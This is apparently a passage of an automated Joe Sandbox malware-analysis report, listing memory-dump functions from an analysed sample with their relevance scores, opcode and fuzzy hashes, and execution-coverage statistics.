                                                  • Opcode Fuzzy Hash: 4ab8b1b5fd4a6f4729bc247b24a0a17d4e85d0da40f617fee0caa36cedc046ea
                                                  • Instruction Fuzzy Hash: 63C08CB00123048BD3106FAAA81C329376CAF06206FC00015EA08414608B714886CFB6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895FA83 Relevance: .0, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13930bb6605cdd3abdd091ddcbdeada492517ed7655ac2772a65d48954a5cff7
                                                  • Instruction ID: a83f0f90833cf504f56f02eb788ec5b7fc9590b446f2fe99998076bbeacfd85a
                                                  • Opcode Fuzzy Hash: 13930bb6605cdd3abdd091ddcbdeada492517ed7655ac2772a65d48954a5cff7
                                                  • Instruction Fuzzy Hash: 04B09B3594660CC7C750DA50F4544BD7736EB8A232B105285DC0E231004F315950CA95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAE41C Relevance: .0, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 681dedbfdf9f8162d3ebc45c3ff037dc5acf6ea8aff2af64f0667aadd4662e24
                                                  • Instruction ID: 4fa0987838fc3258bfe2bcd001ce73952f2fd5ef10f432c5f8a516853d3a28b9
                                                  • Opcode Fuzzy Hash: 681dedbfdf9f8162d3ebc45c3ff037dc5acf6ea8aff2af64f0667aadd4662e24
                                                  • Instruction Fuzzy Hash: A2B01275294300E7BAC463648C50A5BAA66BBF5B01B40BC42731814010DD70E429E36F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 0895C388 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: T+-q$[V~*$[V~*$]\`
                                                  • API String ID: 0-1849991408
                                                  • Opcode ID: a63563a1a284b55ad8cfe78a8599e8cdc1d291871e8c7b6c22b5ea3e6f4bd5f0
                                                  • Instruction ID: 632a85313d21cfc0e67b8503a50962086ed2913a77f417107fd4d1b2f3e06d22
                                                  • Opcode Fuzzy Hash: a63563a1a284b55ad8cfe78a8599e8cdc1d291871e8c7b6c22b5ea3e6f4bd5f0
                                                  • Instruction Fuzzy Hash: C0B116B0E152199FCB04DFAAD9808AEFBF2FF89305F54D92AD815BB214D73099428F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895C378 Relevance: 4.0, Strings: 3, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: T+-q$[V~*$]\`
                                                  • API String ID: 0-3978741314
                                                  • Opcode ID: e9a62a80e6be190934ec47fc510e58b26118f62248416e234024c449c09da216
                                                  • Instruction ID: e8d88e3fdacbba050a5e7d3cf9bcf2d93cef46cfac4fcb3da487a395b83813bd
                                                  • Opcode Fuzzy Hash: e9a62a80e6be190934ec47fc510e58b26118f62248416e234024c449c09da216
                                                  • Instruction Fuzzy Hash: 1DB117B0E152199FCB04DFAAD9808AEFBF2FF89305F54D92AD815BB214D73099428F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA82A8 Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 7Z/t$RWIK$[[bb
                                                  • API String ID: 0-1157992699
                                                  • Opcode ID: 668f8d1441c90c8ec53d81a17e69523536d44331c98a1e893a0645db2403501c
                                                  • Instruction ID: 5c4370a1417085951479ecd292ab0bb2749f79f7387298b3a564f73bf48a15a0
                                                  • Opcode Fuzzy Hash: 668f8d1441c90c8ec53d81a17e69523536d44331c98a1e893a0645db2403501c
                                                  • Instruction Fuzzy Hash: DB51F570E05709CFDB48CFAAC5455AEFBF2AF89300F14E42AD459AB254D7349A428F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA6F10 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: f15c47a7cf97fa8bf208badf5a2a5bafdc880df71b30a2e706514f7aa28decc3
                                                  • Instruction ID: a3cbc95116b98ae646c392bc750a6eca8539a1ce638b5811f354416e2558984f
                                                  • Opcode Fuzzy Hash: f15c47a7cf97fa8bf208badf5a2a5bafdc880df71b30a2e706514f7aa28decc3
                                                  • Instruction Fuzzy Hash: 1921FB71E007189BEB58CFABD85079EFBF7AFC9200F14C07AD508A6224DB341A418F51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B7748 Relevance: .5, Instructions: 548COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c51c69ef0f64119c267e65b59e5dd3f0f54dc593175d978fa9885f11cd3ee2b9
                                                  • Instruction ID: 2eef05c435b21a208a2f56c89f1fde2489538adfca9157c757d3c2553075e4a0
                                                  • Opcode Fuzzy Hash: c51c69ef0f64119c267e65b59e5dd3f0f54dc593175d978fa9885f11cd3ee2b9
                                                  • Instruction Fuzzy Hash: C63205B4B002058FDB54DF69C594BADB7F2BF89704F2581A9E506AB361CB31EE01CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08957271 Relevance: .4, Instructions: 380COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 36e88f1780c83adc619797aa95b36cf50a4653599f436769e22c43ffb8b0df07
                                                  • Instruction ID: 4085de9dd4ff562d225f918d267d54cebbff90e538ad9f59fb2385d4ad8918aa
                                                  • Opcode Fuzzy Hash: 36e88f1780c83adc619797aa95b36cf50a4653599f436769e22c43ffb8b0df07
                                                  • Instruction Fuzzy Hash: 2612BB75D0061A8FCB15DF68C8906D9F7B1BF89310F15C6AAD858AB211EB70AAC5CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08957280 Relevance: .4, Instructions: 372COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c7d8503db0fb96ce82ed24b15d3ca64bd0a436d4e2cf5297b872a591109d2a8
                                                  • Instruction ID: d5a209d9eb735983913f1798f09e65cc498f5cc69bfa6fc5d8cdfa555f350745
                                                  • Opcode Fuzzy Hash: 0c7d8503db0fb96ce82ed24b15d3ca64bd0a436d4e2cf5297b872a591109d2a8
                                                  • Instruction Fuzzy Hash: 6D12BA75D0061ACFCB15DF68C890AD9F7B1BF89310F15C6AAD859A7211EB70AAC5CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B3618 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: daea485079375afcdfe26a4fc2460bf951984680ef4c4e8834de289da76f1f30
                                                  • Instruction ID: bfd7b5d7fc47a7ed671901205a06a4d3dc90c6a1ee16a4495c0a5450d8cf3cba
                                                  • Opcode Fuzzy Hash: daea485079375afcdfe26a4fc2460bf951984680ef4c4e8834de289da76f1f30
                                                  • Instruction Fuzzy Hash: 78E119B4E102598FDB24DFA9C580AAEFBF6FF89304F248259D414A7355D730AA42CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B56C0 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73848a70a3378d130d5416725fd12d55bf39e951a416f5b56d83a9b42802620d
                                                  • Instruction ID: 664c8cf484c26e33bbaa7e1ea6abbbcd1e40ed13522e42df9a7d9f1b8ce12640
                                                  • Opcode Fuzzy Hash: 73848a70a3378d130d5416725fd12d55bf39e951a416f5b56d83a9b42802620d
                                                  • Instruction Fuzzy Hash: 51E1FBB4E002598FDB14DF99C580AAEBBF6FF89315F24C2A9D414A7355D7309A42CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B2DA8 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4241d9f6a1bdd3c3d87c8475cb4491726424773d9683108f2af05540f9a0c20b
                                                  • Instruction ID: 789ad94948abe64982607c76dca72be463d96e83883b9cc1009d2464cea0f768
                                                  • Opcode Fuzzy Hash: 4241d9f6a1bdd3c3d87c8475cb4491726424773d9683108f2af05540f9a0c20b
                                                  • Instruction Fuzzy Hash: B1E1FCB4E102598FDB14DF99C580AAEFBF6FF89305F248269D414A7355D730AA42CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B4CC0 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: feab7c9825fdbe0f174e7cad27b7f081f4939c6c034b7dc27f81e6ba8d17ea73
                                                  • Instruction ID: 9b7f0b87c7f802a9537019595d6b2e7e1019bb32941d496a412c729d12244f8b
                                                  • Opcode Fuzzy Hash: feab7c9825fdbe0f174e7cad27b7f081f4939c6c034b7dc27f81e6ba8d17ea73
                                                  • Instruction Fuzzy Hash: 64E10CB4E102598FDB14DF99C580AAEFBF6FF89304F248259E414A7356D731AA42CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B31E0 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68e45c614a19e2436d2e22452e92e8626df30fec9a48d8e4b7328e345d51d8d2
                                                  • Instruction ID: 0bf6f163a41b1060cfb53b2684a0ec0d26f828a2d75c142c6ba8098746a5f8df
                                                  • Opcode Fuzzy Hash: 68e45c614a19e2436d2e22452e92e8626df30fec9a48d8e4b7328e345d51d8d2
                                                  • Instruction Fuzzy Hash: 6DE1E9B4E002598FDB14DF99C580AAEFBF6FF89305F248269D414A7355D731AA42CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0534E6F0 Relevance: .3, Instructions: 302COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584604125.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5340000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ff19c0b6a65d022e5f260609c8c58be88e808b65490911f15f4f5601185ffcc
                                                  • Instruction ID: 00e677e9e628afe5d92e7bb300fe99efb89ae778c344e537499a2c44204c0e41
                                                  • Opcode Fuzzy Hash: 9ff19c0b6a65d022e5f260609c8c58be88e808b65490911f15f4f5601185ffcc
                                                  • Instruction Fuzzy Hash: 9CA1A170B042459FEF59EBB8881477F66ABAFC9A40F14847CD00ADB384DE389D0797A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAF148 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55822dc16cae888851f226cc82b201c901c22a6b32f3001b41dd917f7b90ca6d
                                                  • Instruction ID: de916886fbca591c71cd363cbd84cdb44a2c2eb087253c687c24469f4adfc704
                                                  • Opcode Fuzzy Hash: 55822dc16cae888851f226cc82b201c901c22a6b32f3001b41dd917f7b90ca6d
                                                  • Instruction Fuzzy Hash: 15D11635D2075A8ACB10EBA4D99069DB7B1FFD6300F50C79AE5093B224EF706AC5CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895A67A Relevance: .2, Instructions: 244COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd34170c660a2c8fd5c39a8deb816a5235a9e60d85bdc9eaa501ccd9d4211b70
                                                  • Instruction ID: 2332c362f7d354347a705489e4a626da8d5b04f0d480dc11c4c9432459980785
                                                  • Opcode Fuzzy Hash: bd34170c660a2c8fd5c39a8deb816a5235a9e60d85bdc9eaa501ccd9d4211b70
                                                  • Instruction Fuzzy Hash: E2C18475E01628CFDB58DF6AC944ADDBBF2BF89301F14C1A9D809AB325DB305A858F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAAA60 Relevance: .2, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f2be58b6b984d0d67bac89c88caf22878dbb93c92ad9ce46a76b86ea12e6837
                                                  • Instruction ID: 71276be57422449dd8ac329911c53992b701c2ebcdc94408b36bfd4cfb22aebb
                                                  • Opcode Fuzzy Hash: 9f2be58b6b984d0d67bac89c88caf22878dbb93c92ad9ce46a76b86ea12e6837
                                                  • Instruction Fuzzy Hash: DA81AD74E15319CFDB44CFA9C68499EBBF2FF88310B14956AE415AB320D334AA42CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA8770 Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64c1fe8b6ee950f9842a7cae0585fd84e45efd03775240876887924146af46b7
                                                  • Instruction ID: 32abdf77aa1e387f34ec0895f7af544a421d0dc237286da4bf2bdedcdb7b15e6
                                                  • Opcode Fuzzy Hash: 64c1fe8b6ee950f9842a7cae0585fd84e45efd03775240876887924146af46b7
                                                  • Instruction Fuzzy Hash: 297112B4E013099FDB44CF99D4859EEFBB2FB88310F10952AE415AB354D734AA41CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895A3E0 Relevance: .2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c17e209a5a7b63c6956d5d9689cf3cd13d4618c01a9b361311e63702759dd2e5
                                                  • Instruction ID: 2e5cea6ee76ad0005d97bb2585961efd982e7aa4cf3f3282071a1e824af5b073
                                                  • Opcode Fuzzy Hash: c17e209a5a7b63c6956d5d9689cf3cd13d4618c01a9b361311e63702759dd2e5
                                                  • Instruction Fuzzy Hash: 58614071914245DFD748EFAAE94269EBFF3BFC4300F14C52AD404AB259EF74590A8B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EABED0 Relevance: .2, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 63e830e2ed2911d38a1f1e367d50a45534c8757ca3d5342ae36c8512525df531
                                                  • Instruction ID: 22d441b37bbf54ac651926427caec1fc1179069556b0ddb6c56b22bd8ae33dbf
                                                  • Opcode Fuzzy Hash: 63e830e2ed2911d38a1f1e367d50a45534c8757ca3d5342ae36c8512525df531
                                                  • Instruction Fuzzy Hash: D9613B7491AB09DFD740CF91F585099BFB6FBC8340F71A8A9C0899F168EB34A664CB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895A3F0 Relevance: .2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 405838f78592e8622736383c85bcc6a19d8f2e6ab5daf701c95488323912f1b8
                                                  • Instruction ID: fc421bc87b569a2670db832066c1645030a1994340118b22d2487d6452b33cb9
                                                  • Opcode Fuzzy Hash: 405838f78592e8622736383c85bcc6a19d8f2e6ab5daf701c95488323912f1b8
                                                  • Instruction Fuzzy Hash: A7612E70914245DFD748EFAAE94269EBFF7BFC8300F14C52AD404AB259EF74590A8B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAB918 Relevance: .2, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27b89b57eac5f5a3904c59d16d8243ad82702cf6ed2fe6472511daacb738899c
                                                  • Instruction ID: 6edb9663239aae28a469176d53b42ae98256a18102109eb72414846161f9036f
                                                  • Opcode Fuzzy Hash: 27b89b57eac5f5a3904c59d16d8243ad82702cf6ed2fe6472511daacb738899c
                                                  • Instruction Fuzzy Hash: C361F4B0E0430A9FDB44CFAAC6915EEFBB6FB99200F14945AD419BB214D334AA41CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAD8A8 Relevance: .1, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ccb4d85ad5c39cd4e83df23dcccc23b6934ac8774be8f73cfe89647589a226c
                                                  • Instruction ID: 9997599ef31fef31fd2908bce9ae3a39c6e43fac5a87e7c9ad0aefaf196debfd
                                                  • Opcode Fuzzy Hash: 4ccb4d85ad5c39cd4e83df23dcccc23b6934ac8774be8f73cfe89647589a226c
                                                  • Instruction Fuzzy Hash: 91512870E15309DFDB44CFAAD9855EEBBF2AF88310F10A42AE415AB654D7346A018F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA0040 Relevance: .1, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93b0ce629a5cac16e7dcc6e7365776ebeb76ce29e48dbaddbf0d8640c06d7b9b
                                                  • Instruction ID: f7e59eef18f44911f73497e67e643c290dabf1a68917ee0855e514d253f8256b
                                                  • Opcode Fuzzy Hash: 93b0ce629a5cac16e7dcc6e7365776ebeb76ce29e48dbaddbf0d8640c06d7b9b
                                                  • Instruction Fuzzy Hash: 3A4150B1D016188BEB5CCF6B8D406DAFAF7AFC8305F18C1BA841CAA254DB7415868F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EABC88 Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be1f7062d3df6365e2e179c6f0f5b4187d7ed5c9ef60917e4944b5cec13fce02
                                                  • Instruction ID: ab4ec1b1ebc764c99953bf1104cbe67e556dff1f258a47f1f117965a0227f1a7
                                                  • Opcode Fuzzy Hash: be1f7062d3df6365e2e179c6f0f5b4187d7ed5c9ef60917e4944b5cec13fce02
                                                  • Instruction Fuzzy Hash: EA41B5B0E04309DFDB44CFAAC4815EEFBB2BB88300F24D56AC415AB214D734AA51CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA0032 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05bffea7f2eeaa2f56028ef745a56dd2a93d7a7bd9df4272decc619424c8145d
                                                  • Instruction ID: 42a5c4242c5b56691111fde9dc9f0bc42d9e7b22803b5f41f01cc1fcda243086
                                                  • Opcode Fuzzy Hash: 05bffea7f2eeaa2f56028ef745a56dd2a93d7a7bd9df4272decc619424c8145d
                                                  • Instruction Fuzzy Hash: 024135B1E016588BEB5DCF6B8D4069EFAF3AFC9200F18C1BA841CAF254EB3105568F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08955570 Relevance: 5.2, Strings: 4, Instructions: 187COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$B$B
                                                  • API String ID: 0-685577651
                                                  • Opcode ID: ea251f18b75e941346cfffa23845623420337fcb7bbaccd827df98856198cacf
                                                  • Instruction ID: 98c7beb387102a617587002c271811236738c40ddfbe9516b40a10dda6014a83
                                                  • Opcode Fuzzy Hash: ea251f18b75e941346cfffa23845623420337fcb7bbaccd827df98856198cacf
                                                  • Instruction Fuzzy Hash: DB61F475701605CFCB24EF78C48056EB7B6FF89225725856AE81ACB7A2DB30DC42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08955560 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$B$B
                                                  • API String ID: 0-685577651
                                                  • Opcode ID: c8674d607a136684b863785d5094cb6b0e7d940f905dc467a92e0b1fa9b4427f
                                                  • Instruction ID: bf8db55ecbb3f2200cd1a4d21b8b8e5b7d9d390943a4c334381286bc55b42392
                                                  • Opcode Fuzzy Hash: c8674d607a136684b863785d5094cb6b0e7d940f905dc467a92e0b1fa9b4427f
                                                  • Instruction Fuzzy Hash: 2621BF71B016568FCB25EF6DC8C486EBBB9EF89215726406AE805DB272D730DC42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:6.3%
                                                  Dynamic/Decrypted Code Coverage:72.2%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:90
                                                  Total number of Limit Nodes:7
